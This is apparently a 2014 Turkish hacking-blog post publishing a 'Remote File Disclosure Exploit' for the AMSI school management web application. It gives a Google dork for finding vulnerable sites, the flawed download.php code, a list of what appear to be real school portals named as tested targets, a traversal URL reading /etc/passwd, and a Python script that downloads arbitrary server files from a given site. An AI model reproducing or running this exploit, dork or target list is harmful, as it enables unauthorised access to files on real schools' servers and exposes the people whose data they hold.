AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Exploit Developed by : B3mB4m [~] HomePage : http://h4x0resec.blogspot.com [~] Guzel Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : AMSI ( Academia management solutions international ) |~Affected Version : v3.20.47 build 37 |~Software : http://amsi.ae - http://iconnect.ae |~RISK : Medium |~Google Keyword/Dork : inurl:"?load=news/search_news" |~Tested On : [L] Kali Linux \ [R] example sites ####################INFO################################ makes it possible to read all the files from the local base. ####################################################### ### Error Line in 'download.php' ## .. $path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']); // $path = $_GET['file']; header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1])); header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" ); @readfile($path); .. ######################################################## Example and tested on; http://portal.iconnect.ae/ http://demo.iconnect.ae/ http://barsha.almawakeb.sch.ae/ http://portal.naischool.ae/ http://portal.ias-dubai.ae/ http://portal.madarschool.ae/ http://portal.isas.sch.ae/ http://portal.alsanawbarschool.com/ http://fia.fischools.com/ http://portal.ajyal.sch.ae/ http://portal.arabunityschool.com/ http://alnashaa.sch.ae/ http://portal.aaess.com/ ############################################################ Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd ############################################################ =========Automatic File Source Downloader Exploit ======== ##################### exploit.py ############################## # Coded by b3mb4m import random import os import urllib class B3mB4m(object): def example(self): print """ How to use ? Website: http://VICTIM.com Path : /download.php?file=../../../../etc/passwd """ def exploit(self): ask = raw_input("Website :") uz = raw_input("Path : ") #ask = "http://alnashaa.sch.ae" #uz = "/download.php?file=../../../../etc/passwd" uniq = str(random.randrange(1,1000+1))+".txt" filee = ask+uz try: urllib.urlretrieve(filee, uniq); print "\t\nDownload complate ! " os.startfile(uniq) except: B3mB4m().example() if __name__ == '__main__': B3mB4m().exploit()
23 Aralık 2014 Salı
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder